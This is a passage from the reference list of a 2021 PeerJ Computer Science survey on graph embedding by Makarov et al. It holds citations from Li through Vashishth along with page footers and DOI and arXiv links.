Association for Computing Machinery, 1361–1370. Levie R, Monti F, Bresson X, Bronstein MM. 2017. Cayleynets: graph convolutional neural networks with complex rational spectral filters. IEEE Transactions on Signal Processing 67(1):97–109 DOI 10.1109/TSP.2018.2879624. Li B, Pi D, Lin Y, Khan IA, Cui L. 2020a. Multi-source information fusion based heterogeneous network embedding. Information Sciences 534:53–71 DOI 10.1016/j.ins.2020.05.012. Li G, Luo J, Xiao Q, Liang C, Ding P, Cao B. 2017a. Predicting microrna-disease associations using network topological similarity based on deepwalk. IEEE Access 5:24032–24039 DOI 10.1109/ACCESS.2017.2766758. Li J, Chen C, Tong H, Liu H. 2018. Multi-layered network embedding. In: Proceedings of the 2018 SIAM International Conference on Data Mining. SIAM, 684–692. Li J, Ritter A, Jurafsky D. 2015. Learning multi-faceted representations of individuals from heterogeneous evidence using neural networks. arXiv preprint arXiv:1510.05198. Li J, Zhu J, Zhang B. 2016. Discriminative deep random walk for network classification. In: Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), volume 1. 1004–1013. Li K, Gao J, Guo S, Du N, Li X, Zhang A. 2014a. Lrbm: a restricted boltzmann machine based approach for representation learning on linked data. In: 2014 IEEE International Conference on Data Mining. Piscataway: IEEE, 300–309. Li M, Chen S, Chen X, Zhang Y, Wang Y, Tian Q. 2019a. Actional-structural graph convolutional networks for skeleton-based action recognition. In: The IEEE Conference on Computer Vision and Pattern Recognition (CVPR). Piscataway: IEEE. Li Q, Shang Y, Qiao X, Dai W. 2020b. Heterogeneous dynamic graph attention network. In: 2020 IEEE International Conference on Knowledge Graph (ICKG). Piscataway: IEEE, 404–411. Li W, Xu J, He Y, Yan S, Wu Y, Sun X. 2019b. Coherent comments generation for Chinese articles with a graph-to-sequence model. In: Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics. Florence: Association for Computational Linguistics, 4843–4852. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 49/62 http://dx.doi.org/10.1093/bioinformatics/btx624 https://arxiv.org/abs/2009.00505 http://dx.doi.org/10.1186/s12859-019-2972-5 http://dx.doi.org/10.1145/3363574 http://dx.doi.org/10.1109/TSP.2018.2879624 http://dx.doi.org/10.1016/j.ins.2020.05.012 http://dx.doi.org/10.1109/ACCESS.2017.2766758 https://arxiv.org/abs/1510.05198 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Li X, Chen H. 2009. Recommendation as link prediction: a graph kernel-based machine learning approach. In: Proceedings of the 9th ACM/IEEE-CS Joint Conference on Digital Libraries, JCDL ’09. New York: ACM, 213–216. Li X, Chen W, Chen Y, Zhang X, Gu J, Zhang MQ. 2017b. Network embedding-based representation learning for single cell rna-seq data. Nucleic Acids Research 45(19):e166 DOI 10.1093/nar/gkx750. Li X, Du N, Li H, Li K, Gao J, Zhang A. 2014b. A deep learning approach to link prediction in dynamic networks. In: Proceedings of the 2014 SIAM International Conference on Data Mining. SIAM, 289–297. Li Y, Nie F, Huang H, Huang J. 2015b. Large-scale multi-view spectral clustering via bipartite graph. In: Proceedings of the Twenty-Ninth AAAI Conference on Artificial Intelligence, Volume 29. 2750–2756. Li Y, Tarlow D, Brockschmidt M, Zemel R. 2015c. Gated graph sequence neural networks. arXiv preprint arXiv:1511.05493. Li Y, Yu R, Shahabi C, Liu Y. 2017c. Diffusion convolutional recurrent neural network: data-driven traffic forecasting. arXiv preprint arXiv:1707.01926. Liben-Nowell D, Kleinberg J. 2007. The link-prediction problem for social networks. Journal of the Association for Information Science and Technology 58(7):1019–1031. Lim KW, Buntine WL. 2016. Bibliographic analysis with the citation network topic model. arXiv preprint arXiv:1609.06826. Lin B, Ghaddar B, Nathwani J. 2020a. Deep reinforcement learning for electric vehicle routing problem with time windows. arXiv preprint arXiv:2010.02068. Lin Y, Hou J, Laurienti PJ, Wu G. 2020b. Detecting changes of functional connectivity by dynamic graph embedding learning. In: Martel AL, Abolmaesumi P, Stoyanov D, Mateus D, Zuluaga MA, Zhou SK, Racoceanu D, Joskowicz L, eds. Medical Image Computing and Computer Assisted Intervention—MICCAI 2020. Cham: Springer International Publishing, 489–497. Lin Y, Liu Z, Sun M, Liu Y, Zhu X. 2015. Learning entity and relation embeddings for knowledge graph completion. Twenty-Ninth AAAI Conference on Artificial Intelligence 39:2181–2187. Lin Y-Y, Liu T-L, Chen H-T. 2005. Semantic manifold learning for image retrieval. In: Proceedings of the 13th Annual ACM International Conference on Multimedia. New York: ACM, 249–258. Liu A. 2020. Anonymized gcn: A novel robust graph embedding method via hiding node position in noise. arXiv preprint arXiv:2005.03482. Liu F, Liu B, Sun C, Liu M, Wang X. 2013. Deep learning approaches for link prediction in social network services. In: International Conference on Neural Information Processing. Berlin: Springer International Publishing, 425–432. Liu F, Liu B, Sun C, Liu M, Wang X. 2015a. Deep belief network-based approaches for link prediction in signed social networks. Entropy 17(4):2140–2169 DOI 10.3390/e17042140. Liu J, Xu C, Yin C, Wu W, Song Y. 2020a. K-core based temporal graph convolutional network for dynamic graphs. arXiv preprint arXiv:2003.09902. Liu L, Cheung WK, Li X, Liao L. 2016. Aligning users across social networks using network embedding. In: IJCAI. 1774–1780. Liu R, Cheng W, Tong H, Wang W, Zhang X. 2015b. Robust multi-network clustering via joint cross-domain cluster alignment. In: 2015 IEEE International Conference on Data Mining. Piscataway: IEEE, 291–300. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 50/62 http://dx.doi.org/10.1093/nar/gkx750 https://arxiv.org/abs/1511.05493 https://arxiv.org/abs/1707.01926 https://arxiv.org/abs/1609.06826 https://arxiv.org/abs/2010.02068 https://arxiv.org/abs/2005.03482 http://dx.doi.org/10.3390/e17042140 https://arxiv.org/abs/2003.09902 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Liu W, Chen P-Y, Yeung S, Suzumura T, Chen L. 2017a. Principled multilayer network embedding. In: 2017 IEEE International Conference on Data Mining Workshops (ICDMW). Piscataway: IEEE, 134–141. Liu X, Li Q, Shen C, Peng X, Zhou Y, Guan X. 2020b. Learning by sampling and compressing: efficient graph representation learning with extremely limited annotations. arXiv preprint arXiv:2003.06100. Liu X, Murata T, Kim K-S, Kotarasu C, Zhuang C. 2019. A general view for network embedding as matrix factorization. In: Proceedings of the Twelfth ACM International Conference on Web Search and Data Mining, Volume 12 of WSDM ’19. New York: ACM, 375–383. Liu Y, Kou Z. 2007. Predicting who rated what in large-scale datasets. ACM SIGKDD Explorations Newsletter 9(2):62–65 DOI 10.1145/1345448.1345462. Liu Y, Zhang X, Liu L, Li G. 2020c. Graph embedding based on characteristic of rooted subgraph structure. In: Li G, Shen HT, Yuan Y, Wang X, Liu H, Zhao X, eds. Knowledge Science, Engineering and Management. Cham: Springer International Publishing, 28–39. Liu Z, Chen C, Li L, Zhou J, Li X, Song L, Qi Y. 2018a. Geniepath: graph neural networks with adaptive receptive paths. arXiv preprint arXiv:1802.00910. Liu Z, Zheng VW, Zhao Z, Zhu F, Chang KC-C, Wu M, Ying J. 2017b. Semantic proximity search on heterogeneous graph by proximity embedding. In: AAAI. 154–160. Liu Z, Zheng VW, Zhao Z, Zhu F, Chang KC-C, Wu M, Ying J. 2018b. Distance-aware dag embedding for proximity search on heterogeneous graphs. In: Thirty-Second AAAI Conference on Artificial Intelligence. New York: AAAI, 2355–2362. Lu C, Jiao P, Liu H, Wang Y, Xu H, Wang W. 2019. Ssne: status signed network embedding. In: Yang Q, Zhou Z-H, Gong Z, Zhang M-L, Huang S-J, eds. Advances in Knowledge Discovery and Data Mining. Cham: Springer International Publishing, 81–93. Lü L, Zhou T. 2011. Link prediction in complex networks: a survey. Physica A: Statistical Mechanics and its Applications 390(6):1150–1170 DOI 10.1016/j.physa.2010.11.027. Lu P-E, Chang C-S. 2020. Explainable, stable, and scalable graph convolutional networks for learning graph representation. arXiv preprint arXiv:2009.10367. Lu Q, Getoor L. 2003. Link-based classification. In: Proceedings of the 20th International Conference on Machine Learning (ICML-03). New York: ACM, 496–503. Luo D, Nie F, Huang H, Ding CH. 2011. Cauchy graph embedding. In: Proceedings of the 28th International Conference on Machine Learning (ICML-11). 553–560. Luo H, Li Y, Fu J, Glass J. 2019. Language modeling with graph temporal convolutional networks. https://openreview.net/forum?id=HJlYzhR9tm. Luo Y, Zhao X, Zhou J, Yang J, Zhang Y, Kuang W, Peng J, Chen L, Zeng J. 2017. A network integration approach for drug-target interaction prediction and computational drug repositioning from heterogeneous information. Nature Communications 8(1):1–13 DOI 10.1038/s41467-016-0009-6. Lv X, Hou L, Li J, Liu Z. 2018. Differentiating concepts and instances for knowledge graph embedding. arXiv preprint arXiv:1811.04588. Maaten Lv d, Hinton G. 2008. Visualizing data using t-sne. Journal of Machine Learning Research 9(Nov):2579–2605. Mai G, Janowicz K, Yan B. 2018. Support and centrality: learning weights for knowledge graph embedding models. In: European Knowledge Acquisition Workshop. Berlin: Springer International Publishing, 212–227. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 51/62 https://arxiv.org/abs/2003.06100 http://dx.doi.org/10.1145/1345448.1345462 https://arxiv.org/abs/1802.00910 http://dx.doi.org/10.1016/j.physa.2010.11.027 https://arxiv.org/abs/2009.10367 https://arxiv.org/abs/https://openreview.net/forum?id=HJlYzhR9tm http://dx.doi.org/10.1038/s41467-016-0009-6 https://arxiv.org/abs/1811.04588 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Makarov I, Gerasimova O, Sulimov P, Korovina K, Zhukov L. 2019a. Joint node-edge network embedding for link prediction. In: Springer Proceedings in Mathematics and Statistic (to appear). Berlin: Springer International Publishing, 1–12. Makarov I, Gerasimova O, Sulimov P, Zhukov L. 2019b. Co-authorship network embedding and recommending collaborators via network embedding. In: Springer Proceedings in Mathematics and Statistic (to appear). Berlin: Springer International Publishing, 1–6. Makarov I, Gerasimova O, Sulimov P, Zhukov LE. 2018. Recommending co-authorship via network embeddings and feature engineering. In: Proceedings of the 18th ACM/IEEE JCDL. New York: ACM, 1–2. Makarov I, Gerasimova O, Sulimov P, Zhukov LE. 2019c. Dual network embedding for representing research interests in the link prediction problem on co-authorship networks. PeerJ Computer Science 5(9):e172 DOI 10.7717/peerj-cs.172. Malliaros FD, Vazirgiannis M. 2013. Clustering and community detection in directed networks: a survey. Physics Reports 533(4):95–142 DOI 10.1016/j.physrep.2013.08.002. Marcheggiani D, Bastings J, Titov I. 2018. Exploiting semantics in neural machine translation with graph convolutional networks. arXiv preprint arXiv:1804.08313. Marcheggiani D, Titov I. 2017. Encoding sentences with graph convolutional networks for semantic role labeling. arXiv preprint arXiv:1703.04826. Martinez AM, Kak AC. 2001. Pca versus lda. IEEE Transactions on Pattern Analysis and Machine Intelligence 23(2):228–233 DOI 10.1109/34.908974. McInnes L, Healy J, Melville J. 2018. Umap: uniform manifold approximation and projection for dimension reduction. arXiv preprint arXiv:1802.03426. McPherson M, Smith-Lovin L, Cook JM. 2001. Birds of a feather: homophily in social networks. Annual Review of Sociology 27(1):415–444 DOI 10.1146/annurev.soc.27.1.415. Mikolov T, Sutskever I, Chen K, Corrado GS, Dean J. 2013. Distributed representations of words and phrases and their compositionality. In: Advances in NIPS. Cambridge: MIT press, 3111–3119. Monti F, Boscaini D, Masci J, Rodola E, Svoboda J, Bronstein MM. 2017. Geometric deep learning on graphs and manifolds using mixture model cnns. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. 5115–5124. Monti F, Bronstein M, Bresson X. 2017. Geometric matrix completion with recurrent multi-graph neural networks. In: Advances in Neural Information Processing Systems. 3697–3707. Monti F, Shchur O, Bojchevski A, Litany O, Günnemann S, Bronstein MM. 2018. Dual-primal graph convolutional networks. arXiv preprint arXiv:1806.00770. Mousavi SF, Safayani M, Mirzaei A, Bahonar H. 2017. Hierarchical graph embedding in vector space by graph pyramid. Pattern Recognition 61:245–254 DOI 10.1016/j.patcog.2016.07.043. Moyano LG. 2017. Learning network representations. European Physical Journal Special Topics 226(3):499–518 DOI 10.1140/epjst/e2016-60266-2. Narayanan A, Chandramohan M, Chen L, Liu Y, Saminathan S. 2016. Subgraph2vec: learning distributed representations of rooted sub-graphs from large graphs. arXiv preprint arXiv:1606.08928. Natarajan N, Dhillon IS. 2014. Inductive matrix completion for predicting gene-disease associations. Bioinformatics 30(12):i60–i68 DOI 10.1093/bioinformatics/btu269. Navlakha S, Rastogi R, Shrivastava N. 2008. Graph summarization with bounded error. In: Proceedings of the 2008 ACM SIGMOD International Conference on Management of Data. New York: ACM, 419–432. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 52/62 http://dx.doi.org/10.7717/peerj-cs.172 http://dx.doi.org/10.1016/j.physrep.2013.08.002 https://arxiv.org/abs/1804.08313 https://arxiv.org/abs/1703.04826 http://dx.doi.org/10.1109/34.908974 https://arxiv.org/abs/1802.03426 http://dx.doi.org/10.1146/annurev.soc.27.1.415 https://arxiv.org/abs/1806.00770 http://dx.doi.org/10.1016/j.patcog.2016.07.043 http://dx.doi.org/10.1140/epjst/e2016-60266-2 https://arxiv.org/abs/1606.08928 http://dx.doi.org/10.1093/bioinformatics/btu269 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Newman ME. 2005. A measure of betweenness centrality based on random walks. Social Networks 27(1):39–54 DOI 10.1016/j.socnet.2004.11.009. Newman ME, Girvan M. 2004. Finding and evaluating community structure in networks. Physical Review E 69(2):026113 DOI 10.1103/PhysRevE.69.026113. Ni J, Cheng W, Fan W, Zhang X. 2016. Self-grouping multi-network clustering. In: 2016 IEEE 16th International Conference on Data Mining (ICDM). Piscataway: IEEE, 1119–1124. Nickel M, Murphy K, Tresp V, Gabrilovich E. 2016. A review of relational machine learning for knowledge graphs. Proceedings of the IEEE 104(1):11–33 DOI 10.1109/JPROC.2015.2483592. Nickel M, Rosasco L, Poggio T. 2015. Holographic embeddings of knowledge graphs. arXiv preprint arXiv:1510.04935. Nickel M, Tresp V, Kriegel H-P. 2011. A three-way model for collective learning on multi-relational data. In: ICML, Volume 11. New York: ACM, 809–816. Nie F, Cai G, Li X. 2017. Multi-view clustering and semi-supervised classification with adaptive neighbours. In: Thirty-First AAAI Conference on Artificial Intelligence. New York: AAAI, 31. Nie F, Zhu W, Li X. 2017. Unsupervised large graph embedding. In: AAAI. 2422–2428. Nie F, Zhu W, Li X. 2020. Unsupervised large graph embedding based on balanced and hierarchical k-means. IEEE Transactions on Knowledge and Data Engineering PP(99):1. Niepert M, Ahmed M, Kutzkov K. 2016. Learning convolutional neural networks for graphs. In: International Conference on Machine Learning. 2014–2023. Nikolentzos G, Meladianos P, Vazirgiannis M. 2017. Matching node embeddings for graph similarity. In: AAAI. 2429–2435. Nozza D, Fersini E, Messina E. 2020. Cage: constrained deep attributed graph embedding. Information Sciences 518:56–70 DOI 10.1016/j.ins.2019.12.082. Ortega A, Frossard P, Kovacevic J, Moura JMF, Vandergheynst P. 2018a. Graph signal processing: overview, challenges, and applications. Proceedings of the IEEE 106(5):808–828 DOI 10.1109/JPROC.2018.2820126. Ortega F, Bobadilla J, Gutierrez A, Hurtado R, Li X. 2018b. Artificial intelligence scientific documentation dataset for recommender systems. IEEE Access 6:48543–48555 DOI 10.1109/ACCESS.2018.2867731. Ou M, Cui P, Pei J, Zhang Z, Zhu W. 2016. Asymmetric transitivity preserving graph embedding. KDD '16: Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining 22:1105–1114. Pan S, Hu R, Fung S-f, Long G, Jiang J, Zhang C. 2019. Learning graph embedding with adversarial training methods. arXiv preprint arXiv:1901.01250. Pan S, Wu J, Zhu X, Zhang C, Wang Y. 2016. Tri-party deep network representation. Network 11(9):12. Pardalos PM, Xue J. 1994. The maximum clique problem. Journal of Global Optimization 4(3):301–328 DOI 10.1007/BF01098364. Pennington J, Socher R, Manning C. 2014. Glove: global vectors for word representation. In: Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP). 1532–1543. Perozzi B, Al-Rfou R, Skiena S. 2014. Deepwalk: online learning of social representations. Proceedings of the 20th ACM SIGKDD IC on KDD 20:701–710. Perozzi B, Kulkarni V, Chen H, Skiena S. 2017. Don’t walk, skip!: online learning of multi-scale network embeddings. In: Proceedings of the 2017 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining 2017. New York: ACM, 258–265. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 53/62 http://dx.doi.org/10.1016/j.socnet.2004.11.009 http://dx.doi.org/10.1103/PhysRevE.69.026113 http://dx.doi.org/10.1109/JPROC.2015.2483592 https://arxiv.org/abs/1510.04935 http://dx.doi.org/10.1016/j.ins.2019.12.082 http://dx.doi.org/10.1109/JPROC.2018.2820126 http://dx.doi.org/10.1109/ACCESS.2018.2867731 https://arxiv.org/abs/1901.01250 http://dx.doi.org/10.1007/BF01098364 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Perozzi B, Kulkarni V, Skiena S. 2016. Walklets: multiscale graph embeddings for interpretable network classification. arXiv preprint arXiv:1605.02115. Phuc LH, Yamada M, Kashima H. 2020. Link prediction on multiple graphs with graph embedding and optimal transport. In: Proceedings of the National Conference of the Society for Artificial Intelligence, 34th National Conference. JSAI, 4Rin189. Pimentel T, Veloso A, Ziviani N. 2017. Unsupervised and scalable algorithm for learning node representations. In: Proceedings of ICLR Workshop Track. 1–4. Pirotte A, Renders J-M, Saerens M. 2007. et al.Random-walk computation of similarities between nodes of a graph with application to collaborative recommendation. IEEE Transactions on Knowledge & Data Engineering 19(3):355–369 DOI 10.1109/TKDE.2007.46. Qin J, Liu L, Shen H, Hu D. 2020. Uniform pooling for graph networks. Applied Sciences 10(18):6287 DOI 10.3390/app10186287. Quiring B, Vassilevski PS. 2020. Multilevel graph embedding. Epub ahead of print 23 September 2020. Numerical Linear Algebra with Applications DOI 10.1002/nla.2326. Ragesh R, Sellamanickam S, Iyer A, Bairi R, Lingam V. 2020. Hetegcn: heterogeneous graph convolutional networks for text classification. arXiv preprint arXiv:2008.12842. Ren X, He W, Qu M, Voss CR, Ji H, Han J. 2016. Label noise reduction in entity typing by heterogeneous partial-label embedding. In: Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. New York: ACM, 1825–1834. Ribeiro LF, Saverese PH, Figueiredo DR. 2017. Struc2vec: learning node representations from structural identity. Proceedings of the 23rd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining 23:385–394. Rissanen J. 1978. Modeling by shortest data description. Automatica 14(5):465–471 DOI 10.1016/0005-1098(78)90005-5. Robins G, Snijders T, Wang P, Handcock M, Pattison P. 2007. Recent developments in exponential random graph (p*) models for social networks. Social Networks 29(2):192–215 DOI 10.1016/j.socnet.2006.08.003. Rokka Chhetri S, Al Faruque MA. 2020. Dynamic graph embedding. Cham: Springer International Publishing, 209–229. Rossi E, Chamberlain B, Frasca F, Eynard D, Monti F, Bronstein M. 2020a. Temporal graph networks for deep learning on dynamic graphs. arXiv preprint arXiv:2006.10637. Rossi E, Frasca F, Chamberlain B, Eynard D, Bronstein M, Monti F. 2020b. Sign: scalable inception graph neural networks. arXiv preprint arXiv:2004.11198. Roweis ST, Saul LK. 2000. Nonlinear dimensionality reduction by locally linear embedding. Science 290(5500):2323–2326 DOI 10.1126/science.290.5500.2323. Rozemberczki B, Davies R, Sarkar R, Sutton C. 2018. Gemsec: graph embedding with self clustering. arXiv preprint arXiv:1802.03997. Rozemberczki B, Sarkar R. 2018. Fast sequence-based embedding with diffusion graphs. In: International Workshop on Complex Networks. Berlin: Springer International Publishing, 99–107. Sahu SK, Christopoulou F, Miwa M, Ananiadou S. 2019. Inter-sentence relation extraction with document-level graph convolutional neural network. In: Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics. Florence: Association for Computational Linguistics, 4309–4316. Salha G, Hennequin R, Vazirgiannis M. 2020. Simple and effective graph autoencoders with one-hop linear models. arXiv preprint arXiv:2001.07614. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 54/62 https://arxiv.org/abs/1605.02115 http://dx.doi.org/10.1109/TKDE.2007.46 http://dx.doi.org/10.3390/app10186287 http://dx.doi.org/10.1002/nla.2326 https://arxiv.org/abs/2008.12842 http://dx.doi.org/10.1016/0005-1098(78)90005-5 http://dx.doi.org/10.1016/j.socnet.2006.08.003 https://arxiv.org/abs/2006.10637 https://arxiv.org/abs/2004.11198 http://dx.doi.org/10.1126/science.290.5500.2323 https://arxiv.org/abs/1802.03997 https://arxiv.org/abs/2001.07614 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Salim A, Shiju S, Sumitra S. 2020. Design of multi-view graph embedding using multiple kernel learning. Engineering Applications of Artificial Intelligence 90:103534 DOI 10.1016/j.engappai.2020.103534. Scarselli F, Gori M, Tsoi AC, Hagenbuchner M, Monfardini G. 2009. The graph neural network model. IEEE Transactions on Neural Networks 20(1):61–80 DOI 10.1109/TNN.2008.2005605. Sen P, Namata GM, Bilgic M, Getoor L, Gallagher B, Eliassi-Rad T. 2008. Collective classification in network data. AI Magazine 29(3):93–106 DOI 10.1609/aimag.v29i3.2157. Serra A, Greco D, Tagliaferri R. 2015. Impact of different metrics on multi-view clustering. In: 2015 International Joint Conference on Neural Networks (IJCNN). Piscataway: IEEE, 1–8. Sevgili Ö, Panchenko A, Biemann C. 2019. Improving neural entity disambiguation with graph embeddings. In: Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics: Student Research Workshop. Florence: Association for Computational Linguistics, 315–322. Shang J, Ma T, Xiao C, Sun J. 2019. Pre-training of graph augmented transformers for medication recommendation. arXiv preprint arXiv:1906.00346. Shavitt Y, Tankel T. 2008. Hyperbolic embedding of internet graph for distance estimation and overlay construction. IEEE/ACM Transactions on Networking 16(1):25–36 DOI 10.1109/TNET.2007.899021. Shaw B, Jebara T. 2009. Structure preserving embedding. In: Proceedings of the 26th Annual International Conference on Machine Learning. New York: ACM, 937–944. Shen Z, Zhang Y-H, Han K, Nandi AK, Honig B, Huang D-S. 2017. mirna-disease association prediction with collaborative matrix factorization. Complexity 2017(9):1–9 DOI 10.1155/2017/2498957. Shervashidze N, Schweitzer P, Leeuwen EJv, Mehlhorn K, Borgwardt KM. 2011. Weisfeiler-lehman graph kernels. Journal of Machine Learning Research 12(Sep):2539–2561. Shi J, Malik J. 2000. Normalized cuts and image segmentation. Departmental Papers (CIS) 22:107. Shi L, Zhang Y, Cheng J, Lu H. 2019. Skeleton-based action recognition with directed graph neural networks. In: The IEEE Conference on Computer Vision and Pattern Recognition (CVPR). Piscataway: IEEE. Shi M, Tang Y, Zhu X. 2020. Topology and content co-alignment graph convolutional learning. arXiv preprint arXiv:2003.12806. Shi R, Liang T, Peng H, Jiang L, Dai Q. 2020. Heam: Heterogeneous network embedding with automatic meta-path construction. In: Li G, Shen HT, Yuan Y, Wang X, Liu H, Zhao X, eds. Knowledge Science, Engineering and Management. Cham: Springer International Publishing, 304–315. Shuman DI, Narang SK, Frossard P, Ortega A, Vandergheynst P. 2013. The emerging field of signal processing on graphs: extending high-dimensional data analysis to networks and other irregular domains. IEEE Signal Processing Magazine 30(3):83–98 DOI 10.1109/MSP.2012.2235192. Si C, Chen W, Wang W, Wang L, Tan T. 2019. An attention enhanced graph convolutional lstm network for skeleton-based action recognition. In: The IEEE Conference on Computer Vision and Pattern Recognition (CVPR). Piscataway: IEEE. Sinha A, Shen Z, Song Y, Ma H, Eide D, Hsu B-JP, Wang K. 2015. An overview of microsoft academic service (mas) and applications. In: Proceedings of the 24th International Conference on World Wide Web, WWW ’15 Companion. New York: Association for Computing Machinery, 243–246. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 55/62 http://dx.doi.org/10.1016/j.engappai.2020.103534 http://dx.doi.org/10.1109/TNN.2008.2005605 http://dx.doi.org/10.1609/aimag.v29i3.2157 https://arxiv.org/abs/1906.00346 http://dx.doi.org/10.1109/TNET.2007.899021 http://dx.doi.org/10.1155/2017/2498957 https://arxiv.org/abs/2003.12806 http://dx.doi.org/10.1109/MSP.2012.2235192 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Socher R, Chen D, Manning CD, Ng A. 2013. Reasoning with neural tensor networks for knowledge base completion. In: Advances in Neural Information Processing Systems. Cambridge: MIT press, 926–934. Song L. 2018. Structure2vec: deep learning for security analytics over graphs. https://www.usenix. org/conference/scainet18/presentation/song. Song W, Xiao Z, Wang Y, Charlin L, Zhang M, Tang J. 2019. Session-based social recommendation via dynamic graph attention networks. arXiv preprint arXiv:1902.09362. Srinivas V, Mitra P. 2016. Applications of link prediction, chapter 5. Cham: Springer International Publishing, 57–61. Stanovsky G, Gruhl D, Mendes P. 2017. Recognizing mentions of adverse drug reaction in social media using knowledge-infused recurrent models. In: Proceedings of the 15th Conference of the European Chapter of the Association for Computational Linguistics: Volume 1, Long Papers. Valencia: Association for Computational Linguistics, 142–151. Su C, Tong J, Zhu Y, Cui P, Wang F. 2020. Network embedding in biomedical data science. Briefings in Bioinformatics 21(1):182–197 DOI 10.1093/bib/bby117. Sun F-Y, Hoffmann J, Tang J. 2019. Infograph: unsupervised and semi-supervised graph-level representation learning via mutual information maximization. arXiv preprint arXiv:1908.01000. Sun J, Bandyopadhyay B, Bashizade A, Liang J, Sadayappan P, Parthasarathy S. 2019. Atp: directed graph embedding with asymmetric transitivity preservation. Proceedings of the AAAI Conference on Artificial Intelligence 33:265–272 DOI 10.1609/aaai.v33i01.3301265. Sun L, Wang J, Yu PS, Li B. 2018a. Adversarial attack and defense on graph data: a survey. arXiv preprint arXiv:1812.10528. Sun M, Tang J, Li H, Li B, Xiao C, Chen Y, Song D. 2018b. Data poisoning attack against unsupervised node embedding methods. arXiv preprint arXiv:1810.12881. Sun X, Guo J, Ding X, Liu T. 2016. A general framework for content-enhanced network representation learning. arXiv preprint arXiv:1610.02906. Tang J, Liu H. 2012. Unsupervised feature selection for linked social media data. In: Proceedings of the 18th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, KDD ’12. New York: ACM, 904–912. Tang J, Liu J, Zhang M, Mei Q. 2016a. Visualizing large-scale and high-dimensional data. Proceedings of the 25th International Conference on World Wide Web 25:287–297. Tang J, Qu M, Wang M, Zhang M, Yan J, Mei Q. 2015. Line: large-scale information network embedding. Proceedings of the 24th IC on WWW 24:1067–1077. Tang L, Liu H. 2009. Relational learning via latent social dimensions. Proceedings of the 15th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining 15:817–826. Tang L, Liu H. 2011. Leveraging social media networks for classification. Data Mining and Knowledge Discovery 23(3):447–478 DOI 10.1007/s10618-010-0210-x. Tang M, Nie F, Jain R. 2016. Capped lp-norm graph embedding for photo clustering. In: Proceedings of the 2016 ACM on Multimedia Conference. New York: ACM, 431–435. Tenenbaum JB, De Silva V, Langford JC. 2000. A global geometric framework for nonlinear dimensionality reduction. Science 290(5500):2319–2323 DOI 10.1126/science.290.5500.2319. Teng X, Liu J. 2020. Atrributed graph embedding based on multiobjective evolutionary algorithm for overlapping community detection. In: 2020 IEEE Congress on Evolutionary Computation (CEC). Piscataway: IEEE, 1–8. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 56/62 https://arxiv.org/abs/https://www.usenix.org/conference/scainet18/presentation/song https://arxiv.org/abs/https://www.usenix.org/conference/scainet18/presentation/song https://arxiv.org/abs/1902.09362 http://dx.doi.org/10.1093/bib/bby117 https://arxiv.org/abs/1908.01000 http://dx.doi.org/10.1609/aaai.v33i01.3301265 https://arxiv.org/abs/1812.10528 https://arxiv.org/abs/1810.12881 https://arxiv.org/abs/1610.02906 http://dx.doi.org/10.1007/s10618-010-0210-x http://dx.doi.org/10.1126/science.290.5500.2319 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Tian F, Gao B, Cui Q, Chen E, Liu T-Y. 2014. Learning deep representations for graph clustering. In: AAAI. 1293–1299. Tian Y, Hankins RA, Patel JM. 2008. Efficient aggregation for graph summarization. In: Proceedings of the 2008 ACM SIGMOD International Conference on Management of Data. New York: ACM, 567–580. Toivonen H, Zhou F, Hartikainen A, Hinkka A. 2011. Compression of weighted graphs. In: Proceedings of the 17th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. New York: ACM, 965–973. Trouillon T, Dance CR, Gaussier É, Welbl J, Riedel S, Bouchard G. 2017. Knowledge graph completion via complex tensor factorization. Journal of Machine Learning Research 18(1):4735–4772. Trouillon T, Nickel M. 2017. Complex and holographic embeddings of knowledge graphs: a comparison. arXiv preprint arXiv:1707.01475. Tsitsulin A, Mottin D, Karras P, Müller E. 2018. Verse: versatile graph embeddings from similarity measures. In: Proceedings of the 2018 World Wide Web Conference. 539–548. Tsitsulin A, Munkhoeva M, Perozzi B. 2020. Just slaq when you approximate: accurate spectral distances for web-scale graphs. In: Proceedings of the Web Conference 2020. 2697–2703. Tu C, Liu H, Liu Z, Sun M. 2017. Cane: context-aware network embedding for relation modeling. Proceedings of the 55th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers) 1:1722–1731. Tu C, Zhang W, Liu Z, Sun M. 2016. Max-margin deepwalk: discriminative learning of network representation. In: Proceedings of the Twenty-Fifth International Joint Conference on Artificial Intelligence (IJCAI-16), Volume 2016. 3889–3895. Vashishth S, Bhandari M, Yadav P, Rai P, Bhattacharyya C, Talukdar P. 2019. Incorporating syntactic and semantic information in word embeddings using graph convolutional networks. In: Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics. Florence: Association for Computational Linguistics, 3308–3318. 